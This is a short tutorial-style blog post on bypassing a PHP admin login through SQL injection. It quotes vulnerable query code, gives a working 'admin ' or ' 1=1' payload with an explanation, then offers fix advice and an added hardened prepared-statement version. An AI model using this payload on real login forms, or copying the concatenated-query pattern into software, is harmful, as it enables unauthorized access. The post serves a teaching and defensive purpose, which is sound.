Thursday, August 30, 2012

How to bypass Admin/user login through SQL Injection

- Code snippet from /admin/login.php
——————————————————————————————————————————
// Vulnerable: both POST values are interpolated straight into the SQL string
$postbruger = $_POST['username'];
$postpass = md5($_POST['password']);
$resultat = mysql_query("SELECT * FROM " . $tablestart . "login WHERE brugernavn = '$postbruger' AND password = '$postpass'")
or die(mysql_error() . "\n");
——————————————————————————————————————————
The variables aren't properly checked, so we can bypass this login. Let's inject the following username and password:
username : admin ' or ' 1=1
password : sirgod
We logged in. Why? Look, the code will become
———————————————————————————————————————————
// $postbruger is substituted verbatim, so the quote inside it ends the string
// literal early and the "or" becomes SQL (the password literal is really md5('sirgod'))
$resultat = mysql_query("SELECT * FROM " . $tablestart . "login WHERE brugernavn = 'admin ' or ' 1=1' AND password = 'sirgod'")
// AND binds tighter than OR, so the WHERE clause reads
//   brugernavn = 'admin ' OR (' 1=1' AND password = 'sirgod')
// and MySQL's default collations ignore trailing spaces in comparisons,
// so 'admin ' matches the existing admin row regardless of the password.
———————————————————————————————————————————
Login bypassed. The username must be an existing username.
How to fix?
Simple way: don't allow special chars in variables. For numeric variables
use (int), example: $id = (int)$_GET['id'];
Another way: for non-numeric variables, filter all special chars used in
SQLi: - , . ( ) ' " _ + / *
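
Filtering characters out of a username is fragile (it rejects legitimate values such as O'Brien and has to anticipate every encoding), so the standard fix is to keep user input out of the SQL text entirely with prepared statements, and to use the (int) cast the post suggests for numeric parameters. The following is an added example of a hardened /admin/login.php, not code from the original post. It assumes a PDO connection in $db, the same $tablestart prefix and brugernavn column as above, an id column for the numeric lookup, and that stored passwords were created with password_hash() instead of md5().

```php
<?php
// Added example (not the original post's code): login without string
// concatenation. Assumes: $db is a PDO handle, $tablestart is the table
// prefix from the post, passwords are stored with password_hash().
declare(strict_types=1);

/**
 * Table names cannot be bound as parameters, so the prefix is validated
 * against a strict character set instead of being interpolated blindly.
 */
function loginTable(string $tablestart): string
{
    if (!preg_match('/^[A-Za-z0-9_]{0,32}$/', $tablestart)) {
        throw new InvalidArgumentException('invalid table prefix');
    }
    return $tablestart . 'login';
}

/**
 * Returns the user row on success, or null when the credentials are wrong.
 * The username is sent as a bound parameter, so quotes, "or" and "1=1"
 * inside it are plain data and can never change the query's structure.
 */
function login(PDO $db, string $tablestart, string $username, string $password): ?array
{
    $table = loginTable($tablestart);

    // Look the row up by username only; the password is checked in PHP.
    $stmt = $db->prepare("SELECT * FROM {$table} WHERE brugernavn = :user LIMIT 1");
    $stmt->execute([':user' => $username]);
    $row = $stmt->fetch(PDO::FETCH_ASSOC);

    // password_verify() compares against the salted hash in constant time.
    if ($row === false || !password_verify($password, (string) $row['password'])) {
        return null;
    }
    return $row;
}

/**
 * Numeric parameter handling: cast first (as the post recommends), then
 * bind with an explicit integer type so the driver never quotes it.
 * Assumes an "id" column, which the post does not show.
 */
function findUserById(PDO $db, string $tablestart, $rawId): ?array
{
    $id = (int) $rawId;
    $table = loginTable($tablestart);

    $stmt = $db->prepare("SELECT * FROM {$table} WHERE id = :id");
    $stmt->bindValue(':id', $id, PDO::PARAM_INT);
    $stmt->execute();
    $row = $stmt->fetch(PDO::FETCH_ASSOC);
    return $row === false ? null : $row;
}

// Usage (assumed connection details). Emulated prepares are disabled so
// parameters are bound server-side rather than client-side escaped.
// $db = new PDO('mysql:host=localhost;dbname=app;charset=utf8mb4', 'user', 'secret', [
//     PDO::ATTR_ERRMODE          => PDO::ERRMODE_EXCEPTION,
//     PDO::ATTR_EMULATE_PREPARES => false,
// ]);
// $user = login($db, $tablestart, $_POST['username'] ?? '', $_POST['password'] ?? '');
// if ($user === null) {
//     http_response_code(401);
//     exit('Login failed');
// }
```

With this version the payload from the post simply looks for a user literally named `admin ' or ' 1=1`, finds nothing, and the login fails. Database errors should also be logged rather than echoed with mysql_error(), since the error text exposes the query structure to the client.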
